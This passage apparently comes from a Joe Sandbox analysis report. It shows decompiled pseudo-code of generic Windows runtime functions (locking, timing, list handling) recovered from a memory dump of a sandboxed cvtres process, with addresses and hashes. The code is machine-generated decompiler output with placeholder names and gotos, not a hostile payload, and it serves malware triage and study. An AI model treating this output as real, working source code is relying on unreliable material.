							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0566C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0566A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0564CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0566ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                        0x0566ae44
                                                                        0x0566ae4c
                                                                        0x0566ae53
                                                                        0x0566ae55
                                                                        0x0566ae5c
                                                                        0x0566ae64
                                                                        0x0566ae68
                                                                        0x0566ae75
                                                                        0x0566ae75
                                                                        0x0566ae78
                                                                        0x0566ae7a
                                                                        0x0566ae7c
                                                                        0x0566ae7f
                                                                        0x0566aea8
                                                                        0x0566aeab
                                                                        0x0566aead
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566aeb3
                                                                        0x0566aeb8
                                                                        0x0566aebb
                                                                        0x0566aebd
                                                                        0x00000000
                                                                        0x0566ae81
                                                                        0x0566ae88
                                                                        0x0566ae8f
                                                                        0x0566ae9b
                                                                        0x0566ae96
                                                                        0x0566ae96
                                                                        0x0566ae96
                                                                        0x0566aea0
                                                                        0x0566aea3
                                                                        0x0566aebf
                                                                        0x0566aebf
                                                                        0x0566aec3
                                                                        0x0566aec9
                                                                        0x0566af0d
                                                                        0x0566af14
                                                                        0x0566af3d
                                                                        0x0566af3d
                                                                        0x0566af41
                                                                        0x0566af44
                                                                        0x0566af67
                                                                        0x0566af67
                                                                        0x0566af6a
                                                                        0x0566afca
                                                                        0x0566afd1
                                                                        0x00000000
                                                                        0x0566afd1
                                                                        0x0566af6c
                                                                        0x0566af6d
                                                                        0x0566af75
                                                                        0x0566af7c
                                                                        0x0566af7e
                                                                        0x0566af80
                                                                        0x0566af85
                                                                        0x0566af87
                                                                        0x0566af99
                                                                        0x0566af89
                                                                        0x0566af92
                                                                        0x0566af92
                                                                        0x0566af9e
                                                                        0x0566afa1
                                                                        0x0566afa3
                                                                        0x0566afa9
                                                                        0x0566afb0
                                                                        0x0566afb2
                                                                        0x0566afb4
                                                                        0x0566afbc
                                                                        0x0566afbc
                                                                        0x0566afb4
                                                                        0x0566afb0
                                                                        0x00000000
                                                                        0x0566afa1
                                                                        0x0566af4f
                                                                        0x0566af57
                                                                        0x0566af5c
                                                                        0x0566af5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566af60
                                                                        0x0566af64
                                                                        0x0566af64
                                                                        0x00000000
                                                                        0x0566af64
                                                                        0x0566af1a
                                                                        0x0566af25
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566af27
                                                                        0x0566af28
                                                                        0x0566af33
                                                                        0x00000000
                                                                        0x0566aed0
                                                                        0x0566aed0
                                                                        0x0566aed2
                                                                        0x0566aee1
                                                                        0x0566aee4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566aee6
                                                                        0x0566aeec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566aefb
                                                                        0x0566af07
                                                                        0x0566afd3
                                                                        0x0566afdb
                                                                        0x0566afdb
                                                                        0x00000000
                                                                        0x0566af07
                                                                        0x0566aed6
                                                                        0x0566aed8
                                                                        0x0566aedf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0566aedf
                                                                        0x0566aec9

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57eb0513844dd9353c40aafa385628ebfc00b01f911831f5bed8040423245214
                                                                        • Instruction ID: 71623837fca1d679b2348d5afcb32f986ee5cd26296f678e103ffc5e4699633d
                                                                        • Opcode Fuzzy Hash: 57eb0513844dd9353c40aafa385628ebfc00b01f911831f5bed8040423245214
                                                                        • Instruction Fuzzy Hash: 4141C2B1704612DBD726DAA9C898F3BB79ABF84620F04421DF857A7B90DB34D801D792
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CDBE9 Relevance: .1, Instructions: 149COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E055CDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E055ACC50(E055A4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E055C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E05678ED6(_t102, _t98);
						}
						_t76 = _v44;
						E055C2280(_t58, _v44);
						E055CDD82(_v44, _t102, _t98);
						E055CB944(_t102, _v5);
						return E055BFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x5698628; // 0x0
							_v28 = _t67;
							_t68 =  *0x569862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x5698628; // 0x0
						_t105 = _v28;
						_t80 =  *0x569862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x566fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                        0x055cdbe9
                                                                        0x055cdbf2
                                                                        0x055cdbf7
                                                                        0x055cdbf9
                                                                        0x055cdbfc
                                                                        0x055cdc00
                                                                        0x055cdc03
                                                                        0x055cdc14
                                                                        0x055cdd54
                                                                        0x055cdd54
                                                                        0x055cdd54
                                                                        0x055cdc18
                                                                        0x055cdc1d
                                                                        0x055cdc1d
                                                                        0x055cdc32
                                                                        0x055cdc3b
                                                                        0x055cdc3e
                                                                        0x055cdc46
                                                                        0x055cdd5b
                                                                        0x055cdd62
                                                                        0x055cdd64
                                                                        0x055cdd67
                                                                        0x055cdd69
                                                                        0x055cdd6b
                                                                        0x055cdd6e
                                                                        0x055cdd70
                                                                        0x055cdd73
                                                                        0x055cdd73
                                                                        0x00000000
                                                                        0x055cdc4c
                                                                        0x055cdc4e
                                                                        0x05613ae3
                                                                        0x05613ae8
                                                                        0x05613aea
                                                                        0x055cdce7
                                                                        0x055cdce9
                                                                        0x055cdcec
                                                                        0x055cdcee
                                                                        0x055cdcf0
                                                                        0x055cdcf3
                                                                        0x055cdcf5
                                                                        0x05613af2
                                                                        0x05613af5
                                                                        0x05613af5
                                                                        0x055cdd06
                                                                        0x055cdd08
                                                                        0x055cdd0b
                                                                        0x055cdd12
                                                                        0x05613b08
                                                                        0x055cdd18
                                                                        0x055cdd18
                                                                        0x055cdd18
                                                                        0x055cdd20
                                                                        0x055cdd23
                                                                        0x05613b16
                                                                        0x05613b16
                                                                        0x055cdd29
                                                                        0x055cdd2d
                                                                        0x055cdd36
                                                                        0x055cdd40
                                                                        0x055cdd51
                                                                        0x055cdd51
                                                                        0x055cdc54
                                                                        0x055cdc59
                                                                        0x055cdc59
                                                                        0x055cdc5e
                                                                        0x055cdc5e
                                                                        0x055cdc63
                                                                        0x055cdc66
                                                                        0x055cdc6b
                                                                        0x055cdc78
                                                                        0x055cdc7b
                                                                        0x055cdc81
                                                                        0x055cdc81
                                                                        0x055cdc83
                                                                        0x055cdc89
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055cdd7b
                                                                        0x055cdd7b
                                                                        0x055cdc8f
                                                                        0x055cdc8f
                                                                        0x055cdc92
                                                                        0x055cdc99
                                                                        0x055cdc9f
                                                                        0x055cdca5
                                                                        0x055cdcaa
                                                                        0x055cdcaa
                                                                        0x055cdcb3
                                                                        0x055cdcb8
                                                                        0x055cdcbb
                                                                        0x055cdcc1
                                                                        0x055cdccf
                                                                        0x055cdcd2
                                                                        0x055cdcd5
                                                                        0x055cdcd7
                                                                        0x055cdcda
                                                                        0x055cdcdc
                                                                        0x055cdcdc
                                                                        0x055cdce2
                                                                        0x055cdce4
                                                                        0x00000000
                                                                        0x055cdce4

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6a4bc269c2c919bb3a5c711167c7b7d58a3b68fb157e3d336a3961b835f92e8a
                                                                        • Instruction ID: 1727fded7013e1ec63a071adc1af3539e43de7a3b67bb1ffa3ccb5b3b849fc5e
                                                                        • Opcode Fuzzy Hash: 6a4bc269c2c919bb3a5c711167c7b7d58a3b68fb157e3d336a3961b835f92e8a
                                                                        • Instruction Fuzzy Hash: FC5181B1E00645DFCB14CFA8C480AAEBBF6BB48350F2485ADD955E7340EB70A944CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055BEF40 Relevance: .1, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E055BEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E055A9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77cfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E055A2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                        0x055bef4b
                                                                        0x055bef4d
                                                                        0x055bef57
                                                                        0x055bf0bd
                                                                        0x055bf0c2
                                                                        0x055bf0d2
                                                                        0x055bf0d2
                                                                        0x055bf0c2
                                                                        0x055bef5d
                                                                        0x055bef5f
                                                                        0x055bef67
                                                                        0x055bef6a
                                                                        0x055bef6d
                                                                        0x055bef74
                                                                        0x055bef7f
                                                                        0x055bef82
                                                                        0x055bef82
                                                                        0x055bef86
                                                                        0x055bef88
                                                                        0x055bef8c
                                                                        0x055bef8f
                                                                        0x055bef8f
                                                                        0x055bef8f
                                                                        0x00000000
                                                                        0x055bef91
                                                                        0x055bef93
                                                                        0x055befc4
                                                                        0x055befc4
                                                                        0x055befc4
                                                                        0x055befca
                                                                        0x055befd0
                                                                        0x055bf0a6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055bf0af
                                                                        0x0560bb06
                                                                        0x0560bb0a
                                                                        0x055bf0b5
                                                                        0x055bf0b5
                                                                        0x055bf0b5
                                                                        0x055bf0b5
                                                                        0x00000000
                                                                        0x055befd6
                                                                        0x055befd9
                                                                        0x055bf0de
                                                                        0x055bf0e2
                                                                        0x055befdf
                                                                        0x055befdf
                                                                        0x055befdf
                                                                        0x055befe5
                                                                        0x0560bafc
                                                                        0x0560bafc
                                                                        0x055befe5
                                                                        0x055befeb
                                                                        0x055befed
                                                                        0x055bf00f
                                                                        0x055bf011
                                                                        0x055bf01a
                                                                        0x055bf01d
                                                                        0x055bf021
                                                                        0x055bf028
                                                                        0x055bf029
                                                                        0x055bf029
                                                                        0x055bf02c
                                                                        0x00000000
                                                                        0x055bf02c
                                                                        0x055beff3
                                                                        0x055beff9
                                                                        0x055bf0ea
                                                                        0x055bf0ed
                                                                        0x055bf0ef
                                                                        0x00000000
                                                                        0x055bf0ef
                                                                        0x055bf003
                                                                        0x0560bb12
                                                                        0x055bf045
                                                                        0x055bf049
                                                                        0x055bf051
                                                                        0x055bf09e
                                                                        0x055bf0a0
                                                                        0x055bf0a0
                                                                        0x055bf09e
                                                                        0x055bf053
                                                                        0x055bf064
                                                                        0x055bf064
                                                                        0x055bf06b
                                                                        0x0560bb1a
                                                                        0x0560bb1a
                                                                        0x055bf071
                                                                        0x055bf071
                                                                        0x055bf07d
                                                                        0x055bf082
                                                                        0x055bf08f
                                                                        0x055bf08f
                                                                        0x055bf009
                                                                        0x055bf00d
                                                                        0x00000000
                                                                        0x055bf00d
                                                                        0x055befd0
                                                                        0x055bef97
                                                                        0x055befa5
                                                                        0x055befaa
                                                                        0x00000000
                                                                        0x055befac
                                                                        0x055befac
                                                                        0x055befac
                                                                        0x00000000
                                                                        0x055befb2
                                                                        0x055bf036
                                                                        0x055bf03a
                                                                        0x055bf040
                                                                        0x055bf090
                                                                        0x00000000
                                                                        0x055bf092
                                                                        0x055bf042
                                                                        0x00000000
                                                                        0x055bf042
                                                                        0x055befb7
                                                                        0x055befb9
                                                                        0x055befbc
                                                                        0x055befb0
                                                                        0x055befb0
                                                                        0x00000000
                                                                        0x055befbe
                                                                        0x055befbe
                                                                        0x055befc1
                                                                        0x00000000
                                                                        0x055befc1
                                                                        0x055befbc
                                                                        0x055befaa
                                                                        0x055bef91

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                        • Instruction ID: 6d67f56fd417d2fd4fe67d7deb9b1526a1214b0af0f372fa6d49a1326c8fb206
                                                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                        • Instruction Fuzzy Hash: 6C51E130E04249DFEB24CB68C5D9BEEBBB2BF05314F1881A8D44697391D3B5A989C791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0567740D Relevance: .1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E0567740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E055FD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E055EF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L055C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L055C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E055EF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L055C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                        0x0567740d
                                                                        0x0567740d
                                                                        0x05677412
                                                                        0x05677413
                                                                        0x05677416
                                                                        0x05677418
                                                                        0x0567741c
                                                                        0x0567741f
                                                                        0x05677422
                                                                        0x05677422
                                                                        0x05677428
                                                                        0x0567742a
                                                                        0x0567742a
                                                                        0x05677451
                                                                        0x05677432
                                                                        0x0567744f
                                                                        0x0567744f
                                                                        0x00000000
                                                                        0x05677434
                                                                        0x05677438
                                                                        0x05677443
                                                                        0x05677517
                                                                        0x05677517
                                                                        0x0567751a
                                                                        0x05677535
                                                                        0x05677520
                                                                        0x05677527
                                                                        0x0567752c
                                                                        0x05677531
                                                                        0x05677533
                                                                        0x00000000
                                                                        0x05677533
                                                                        0x00000000
                                                                        0x05677531
                                                                        0x0567754b
                                                                        0x0567754f
                                                                        0x0567755c
                                                                        0x0567755c
                                                                        0x0567755f
                                                                        0x05677560
                                                                        0x05677561
                                                                        0x05677562
                                                                        0x05677563
                                                                        0x05677568
                                                                        0x0567756a
                                                                        0x0567756c
                                                                        0x0567756d
                                                                        0x0567756d
                                                                        0x0567756f
                                                                        0x05677572
                                                                        0x05677574
                                                                        0x05677577
                                                                        0x0567757c
                                                                        0x0567757f
                                                                        0x00000000
                                                                        0x05677551
                                                                        0x05677551
                                                                        0x05677551
                                                                        0x05677553
                                                                        0x05677553
                                                                        0x05677449
                                                                        0x05677449
                                                                        0x0567744c
                                                                        0x0567744c
                                                                        0x00000000
                                                                        0x0567744c
                                                                        0x05677443
                                                                        0x0567750e
                                                                        0x05677514
                                                                        0x05677514
                                                                        0x05677455
                                                                        0x05677469
                                                                        0x0567746d
                                                                        0x00000000
                                                                        0x05677473
                                                                        0x05677473
                                                                        0x05677476
                                                                        0x05677480
                                                                        0x05677484
                                                                        0x0567748e
                                                                        0x05677493
                                                                        0x05677493
                                                                        0x05677496
                                                                        0x05677499
                                                                        0x056774a1
                                                                        0x056774b1
                                                                        0x056774b5
                                                                        0x00000000
                                                                        0x056774bb
                                                                        0x056774c1
                                                                        0x056774c1
                                                                        0x056774c4
                                                                        0x056774c5
                                                                        0x056774c6
                                                                        0x056774c7
                                                                        0x056774c8
                                                                        0x056774cd
                                                                        0x00000000
                                                                        0x056774d3
                                                                        0x056774d3
                                                                        0x056774d6
                                                                        0x056774d8
                                                                        0x056774db
                                                                        0x056774dd
                                                                        0x056774e0
                                                                        0x056774e7
                                                                        0x056774ee
                                                                        0x056774ee
                                                                        0x056774f4
                                                                        0x056774f9
                                                                        0x00000000
                                                                        0x056774fb
                                                                        0x056774fb
                                                                        0x056774fd
                                                                        0x05677500
                                                                        0x05677503
                                                                        0x05677505
                                                                        0x05677505
                                                                        0x056774f9
                                                                        0x00000000
                                                                        0x056774cd
                                                                        0x056774b5
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                        • Instruction ID: 423b1674fd1dba6e0293b524e03689cacc33e3f1324e761658864550a6a5f11d
                                                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                        • Instruction Fuzzy Hash: 6F518B7160060AEFDB25CF54D480E96BBB6FF45304F14C1AAE908DF216E771EA86CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D2990 Relevance: .1, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E055D2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x567ff00);
				E055FD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x5581664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
